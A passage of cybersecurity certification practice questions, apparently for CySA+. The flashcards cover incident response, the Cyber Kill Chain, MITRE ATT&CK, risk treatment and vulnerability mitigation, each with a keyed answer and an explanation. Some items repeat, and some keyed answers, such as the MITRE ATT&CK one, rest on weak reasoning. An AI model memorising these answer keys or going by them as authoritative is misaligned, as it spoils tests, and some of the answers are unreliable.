D. Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks

A

Correct Answer: D

Given the specific issue of reporting discrepancies, Option D is the most comprehensive solution. It directly addresses the problem by clarifying roles and responsibilities, which is essential for effective incident management.

A. Creating a playbook denoting specific SLAs and containment actions per incident type
- Pros: A playbook can provide detailed guidance on how to handle different types of incidents, including specific Service Level Agreements (SLAs) and containment actions. This can help ensure consistency and efficiency in incident response.
- Cons: While useful, this option may not directly address the issue of discrepancies in reporting responsibilities and timing. It focuses more on the actions to be taken rather than clarifying roles and responsibilities.

B. Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs
- Pros: This ensures that the organization is compliant with legal and regulatory requirements, which is crucial for avoiding penalties and ensuring proper incident handling.
- Cons: Although important, this option may not resolve the internal confusion about who is responsible for reporting and when. It focuses on the requirements rather than the assignment of responsibilities.

C. Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders
- Pros: This helps in identifying the types of incidents that need to be reported externally, ensuring that the organization meets its legal and regulatory obligations.
- Cons: While this clarifies what needs to be reported, it does not address who is responsible for the reporting and the timing, which are the core issues identified in the lessons learned review.

D. Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks
- Pros: This directly addresses the issue of discrepancies in reporting responsibilities and timing. By clearly defining roles and responsibilities, it ensures that everyone knows who is responsible for what and when, reducing confusion and improving the efficiency of the incident response process.
- Cons: This option may require additional training and communication to ensure that all team members understand their roles and responsibilities.

202
Q

A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company’s business type may be able to breach the network and remain inside of it for an extended period of time. Which of the following techniques should be performed to meet the CISO’s goals?

A. Vulnerability scanning
B. Adversary emulation
C. Passive discovery
D. Bug bounty

A

Correct Answer: B

To address the CISO’s concern about a threat actor potentially breaching the network and remaining undetected, the most appropriate technique would be B. Adversary emulation. This technique involves simulating the tactics, techniques, and procedures (TTPs) of known threat actors to test the organization’s defenses and identify potential weaknesses.

Adversary emulation helps in understanding how an attacker might operate within the network, allowing the organization to improve detection and response capabilities.

203
Q

Which of the following can be used to learn more about TTPs used by cybercriminals?

A. ZenMAP
B. MITRE ATT&CK
C. National Institute of Standards and Technology
D. theHarvester

A

Correct Answer: B

The MITRE ATT&CK framework is specifically designed to document and categorize the Tactics, Techniques, and Procedures (TTPs) used by cybercriminals and threat actors. It is a valuable resource for understanding and analyzing adversary behavior.

203
Q

Which of the following statements best describes the MITRE ATT&CK framework?

A. It provides a comprehensive method to test the security of applications.
B. It provides threat intelligence sharing and development of action and mitigation strategies.
C. It helps identify and stop enemy activity by highlighting the areas where an attacker functions.
D. It tracks and understands threats and is an open-source project that evolves.
E. It breaks down intrusions into a clearly defined sequence of phases.

A

Correct Answer: C

While D offers a broader and more detailed description, C focuses on the actionable and practical benefits of the MITRE ATT&CK framework, which can be seen as more immediately relevant to cybersecurity professionals in the field.

204
Q

During an incident, some IoCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

A. Isolation
B. Remediation
C. Reimaging
D. Preservation

A

Correct Answer: A

This step is crucial to prevent the spread of the ransomware to other parts of the network and to contain the incident.

205
Q

An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?

A. KPI
B. SLO
C. SLA
D. MOU

A

Correct Answer: C

The document that was violated in this scenario is the SLA (Service Level Agreement). An SLA outlines the expected level of service between a service provider and a customer, including response times and deadlines. Missing an incident response deadline would be a violation of the SLA.

206
Q

Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

A. To ensure the report is legally acceptable in case it needs to be presented in court
B. To present a lessons-learned analysis for the incident response team
C. To ensure the evidence can be used in a postmortem analysis
D. To prevent the possible loss of a data source for further root cause analysis

A

Correct Answer: A

Proper handling and reporting of evidence are crucial during the investigation and reporting phases of an incident response to maintain the integrity and admissibility of the evidence in legal proceedings. This ensures that the evidence can be used effectively if the incident leads to legal action.

207
Q

An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following is this an example of?

A. Passive network footprinting
B. OS fingerprinting
C. Service port identification
D. Application versioning

A

Correct Answer: A

Passive network footprinting involves gathering information about a target network without actively engaging with the systems. By reviewing syslog entries, the attacker can gather valuable insights about the network’s structure, active services, and potential vulnerabilities without triggering any alarms.

208
Q

A security analyst observed the following activities in chronological order:

  1. Protocol violation alerts on external firewall
  2. Unauthorized internal scanning activity
  3. Changes in outbound network performance

Which of the following best describes the goal of the threat actor?

A. Data exfiltration
B. Unusual traffic spikes
C. Rogue devices
D. Irregular peer-to-peer communication

A

Correct Answer: A

These activities align with the typical steps taken in a data exfiltration scenario.

  • Protocol violation alerts on external firewall: This suggests an attempt to bypass security controls.
  • Unauthorized internal scanning activity: This indicates the threat actor is mapping the internal network to find valuable data or vulnerabilities.
  • Changes in outbound network performance: This is often a sign of data being transferred out of the network.
209
Q

After reviewing the final report for a penetration test, a cybersecurity analyst prioritizes the remediation for input validation vulnerabilities. Which of the following attacks is the analyst seeking to prevent?

A. DNS poisoning
B. Pharming
C. Phishing
D. Cross-site scripting

A

Correct Answer: D

The correct answer is D. Cross-site scripting (XSS). Input validation vulnerabilities are often targeted by XSS attacks, where malicious scripts are injected into otherwise benign and trusted websites.

210
Q

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?

A. Perform OS hardening.
B. Implement input validation.
C. Update third-party dependencies.
D. Configure address space layout randomization.

A

Correct Answer: B

To mitigate a buffer overflow vulnerability at the application level, the best option would be to implement input validation (Option B). This practice ensures that the application properly checks and sanitizes all input data, preventing malicious input that could exploit the buffer overflow vulnerability.

211
Q

The SOC received a threat intelligence notification indicating that an employee’s credentials were found on the dark web. The user’s web and log-in activities were reviewed for malicious or anomalous connections, data uploads/downloads, and exploits. A review of the controls confirmed multifactor authentication was enabled. Which of the following should be done first to mitigate impact to the business networks and assets?

A. Perform a forced password reset.
B. Communicate the compromised credentials to the user.
C. Perform an ad hoc AV scan on the user’s laptop.
D. Review and ensure privileges assigned to the user’s account reflect least privilege.
E. Lower the thresholds for SOC alerting of suspected malicious activity

A

Correct Answer: A

This action ensures that the compromised credentials are no longer valid, preventing unauthorized access using those credentials. While other steps are also important, resetting the password immediately helps to contain the threat and protect the network from potential breaches.

212
Q

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Choose two.)

A. Hostname
B. Missing KPI
C. CVE details
D. POC availabilty
E. IoCs
F. npm identifier

A

Correct Answer: C, D

CVE details (C)
- Why: CVE (Common Vulnerabilities and Exposures) details provide standardized information about specific vulnerabilities, including their severity, impact, and potential mitigation steps. This information is crucial for prioritizing and addressing vulnerabilities efficiently.

POC availability (D)
- Why: Proof of Concept (POC) availability demonstrates that a vulnerability can be exploited. This information helps the infrastructure team understand the urgency and potential impact of the vulnerability, enabling them to prioritize patches and remediation efforts.

Incorrect Answers:

Hostname (A)
- Why: While knowing the hostname of affected systems is useful for identifying where patches need to be applied, it does not provide information about the nature or severity of the vulnerabilities themselves.
Missing KPI (B)
- Why: Key Performance Indicators (KPIs) are metrics used to measure performance. Missing KPIs might indicate a gap in monitoring or reporting but do not directly relate to the specifics of vulnerabilities or patch management.
IoCs (E)
- Why: Indicators of Compromise (IoCs) are used to detect and respond to security incidents. While they are important for incident response, they do not directly inform the patch management process.
npm identifier (F)
- Why: An npm identifier is specific to Node.js packages. While it can be relevant for identifying vulnerabilities in specific packages, it is not broadly applicable to all server environments and does not provide comprehensive vulnerability details.

212
Q

Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost. Which of the following risk treatments best describes what the CISO is looking for?

A. Transfer
B. Mitigate
C. Accept
D. Avoid

A

Correct Answer: D

Risk avoidance involves taking actions to eliminate the risk entirely, which in this case means disabling the vulnerable functionality to prevent the risk of Remote Code Execution (RCE). This approach ensures that the risk is not present, aligning with the CISO’s objective of maintaining minimal risk.

212
Q

An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?

A. Delivery
B. Command and control
C. Reconnaissance
D. Weaponization

A

Correct Answer: B

A. Delivery
- Incorrect. The Delivery phase involves transmitting the weaponized payload to the target. This could be through email attachments, malicious links, or other methods. In this scenario, there is no indication of how the malicious payload was delivered to the target system.

B. Command and Control
- Correct. The Command and Control (C2) phase is where the attacker establishes a channel to communicate with and control the compromised system. The unusual outbound connections to a previously blocked IP and the removal of proxy and firewall rules by an unrecognized service account suggest that the attacker is trying to maintain control over the compromised system.

C. Reconnaissance
- Incorrect. The Reconnaissance phase involves gathering information about the target before launching an attack. This could include scanning for vulnerabilities, researching the target’s network, and identifying potential entry points. The scenario describes actions taken after the initial compromise, not the information-gathering stage.

D. Weaponization
- Incorrect. The Weaponization phase involves creating a deliverable payload by combining an exploit with a backdoor. This phase occurs before the Delivery phase. The scenario does not describe the creation of a payload but rather the actions taken after the system has been compromised.

213
Q

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

A. Running regular penetration tests to identify and address new vulnerabilities.
B. Conducting regular security awareness training of employees to prevent social engineering attacks.
C. Deploying an additional layer of access controls to verify authorized individuals.
D. Implementing intrusion detection software to alert security teams of unauthorized access attempts

A

Correct Answer: C

This option directly addresses the authentication vulnerability by adding another layer of verification, ensuring that only authorized individuals can access the sensitive database. This aligns well with the principles of defense in depth and layered security, which are key concepts in the CompTIA CySA+ (CS0-003) Exam.

214
Q

A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?

A. Potential precursor to an attack
B. Unauthorized peer-to-peer communication
C. Rogue device on the network
D. System updates.

A

Correct Answer: A

Unauthorized scans are often used by attackers to gather information about a network, such as identifying open ports, services, and potential vulnerabilities. This activity is typically a reconnaissance step in the early stages of an attack.

215
Q

A development team recently released a new version of a public-facing website for testing prior to production. The development team is soliciting the help of various teams to validate the functionality of the website due to its high visibility. Which of the following activities best describes the process the development team is initiating?

A. Code review
B. User acceptance testing
C. Stress testing
D. Static analysis

A

Answer: B

Explanation:
User acceptance testing is a process of verifying that a software application meets the requirements and expectations of the end users before it is released to production. User acceptance testing can help to validate the functionality, usability, performance and compatibility of the software application with real-world scenarios and feedback . User acceptance testing can involve various teams, such as developers, testers, customers and stakeholders.

216
Q

While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code?

A. Address space layout randomization
B. Stack canary
C. Data execution prevention
D. Code obfuscation

A

Correct Answer: A

Address space layout randomization (ASLR) is a security control that randomizes the memory address space of a process, making it harder for an attacker to exploit memory-based vulnerabilities, such as buffer overflows1. ASLR can also prevent a security analyst from finding the proper memory address of a piece of malicious code, as the memory address changes every time the process runs.

The other options are not the best explanations for why the memory address changes every time the process runs.

Data execution prevention is a security control that prevents code from being executed in certain memory regions, such as the stack or the heap. Stack canary is a security technique that places a random value on the stack before a function’s return address, to detect and prevent stack buffer overflows.

Code obfuscation is a technique that modifies the source code or binary of a program to make it more difficult to understand or reverse engineer. These techniques do not affect the memory address space of a process, but rather the execution or analysis of the code.

217
Q

Which of the following most accurately describes the Cyber Kill Chain methodology?

A. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.
B. It is used to correlate events to ascertain the TTPs of an attacker.
C. It outlines a clear path for determining the relationships between the attacker, the technology used, and the target
D. It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage

A

Answer: D

Explanation:
The Cyber Kill Chain methodology provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage. It is divided into seven stages: reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives. It helps network defenders understand and prevent cyberattacks by identifying the attacker’s objectives and tactics. References: The Cyber Kill Chain: The Seven Steps of a Cyberattack

218
Q

An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

A. Disable administrative accounts for any operations.
B. Harden systems by disabling or removing unnecessary services.
C. Implement MFA requirements for all internal resources.
D. Implement controls to block execution of untrusted applications.

A

Answer: D

Explanation:
Implementing controls to block execution of untrusted applications can prevent privilege escalation attacks that leverage native Windows tools, such as PowerShell, WMIC, or Rundll32. These tools can be used by attackers to run malicious code or commands with elevated privileges, bypassing system security policies and controls. By restricting the execution of untrusted applications, organizations can reduce the attack surface and limit the potential damage of privilege escalation attacks.

219
Q

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

A. To ensure the evidence can be used in a postmortem analysis
B. To prevent the possible loss of a data source for further root cause analysis
C. TO ensure the report is legally acceptable in case it needs to be presented in court
D. To present a lessons-learned analysis for the incident response team

A

Answer: C

Explanation:
Proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response because they ensure the integrity, authenticity, and admissibility of the evidence in case it needs to be presented in court. Evidence that is mishandled, tampered with, or poorly documented may not be accepted by the court or may be challenged by the opposing party. Therefore, incident responders should follow the best practices and standards for evidence collection, preservation, analysis, and reporting.

The other options are not reasons why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response. They are rather outcomes or benefits of conducting a thorough and effective incident response process. A lessons-learned analysis (B) is a way to identify the strengths and weaknesses of the incident response team and improve their performance for future incidents. A postmortem analysis is a way to determine the root cause, impact, and timeline of the incident and provide recommendations for remediation and prevention. A root cause analysis (D) is a way to identify the underlying factors that led to the incident and address them accordingly.

220
Q

A security analyst is monitoring a company’s network traffic and finds ping requests going to accounting and human resources servers from a SQL server. Upon investigation, the analyst discovers a technician responded to potential network connectivity issues. Which of the following is the best way for the security analyst to respond?

A. Implement host-based firewalls on all systems to prevent ping sweeps in the future.
B. Report this activity as a false positive, as the activity is legitimate.
C. Recommend network segmentation to the management team as a way to secure the various environments.
D. Isolate the system and begin a forensic investigation to determine what was compromised.

A

Answer: B

Explanation:
Reporting this activity as a false positive, as the activity is legitimate, is the best way for the security analyst to respond. A false positive is a condition in which harmless traffic is classified as a potential network attack by a security monitoring tool. Ping requests are a common network diagnostic tool that can be used to test network connectivity issues. The technician who responded to potential network connectivity issues was performing a legitimate task and did not pose any threat to the accounting and human resources servers .

221
Q

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following must be considered to ensure the consultant does no harm to operations?

A. Employing Nmap Scripting Engine scanning techniques
B. Using passive instead of active vulnerability scans
C. Preserving the state of PLC ladder logic prior to scanning
D. Running scans during off-peak manufacturing hours

A

Answer: B

Explanation:
In environments with fragile and legacy equipment, passive scanning is preferred to prevent any potential disruptions that active scanning might cause.
When assessing the security of an Operational Technology (OT) network, especially one with fragile and legacy equipment, it’s crucial to use passive instead of active vulnerability scans. Active scanning can sometimes disrupt the operation of sensitive or older equipment. Passive scanning listens to network traffic without sending probing requests, thus minimizing the risk of disruption.

222
Q

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?

A. Roll out a CDN.
B. Deploy an IPS in the perimeter network.
C. Block the attacks using firewall rules.
D. Implement a load balancer.

A

Answer: A

Explanation:
Rolling out a CDN is the best control to mitigate the Layer 4 DDoS attacks against the company website. A CDN is a Content Delivery Network, which is a system of distributed servers that deliver web content to users based on their geographic location, the origin of the web page, and the content delivery server. A CDN can help protect against Layer 4 DDoS attacks, which are volumetric attacks that aim to exhaust the network bandwidth or resources of the target website by sending a large amount of traffic, such as SYN floods, UDP floods, or ICMP floods. A CDN can mitigate these attacks by distributing the traffic across multiple servers, caching the web content closer to the users, filtering out malicious or unwanted traffic, and providing scalability and redundancy for the website12. Reference: How to Stop a DDoS Attack: Mitigation Steps for Each OSI Layer, Application layer DDoS attack | Cloudflare

223
Q

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?

A. Weaponization
B. Installation
C. Reconnaissance
D. Exploitation

A

Answer: A

Explanation:
Weaponization is the stage of the Cyber Kill Chain where the attacker creates or modifies a malicious payload to use against a target. In this case, the disgruntled open-source developer has created a logic bomb that will act as a wiper, which is a type of malware that destroys data on a system. This is an example of weaponization, as the developer has prepared a cyberweapon to sabotage the code repository.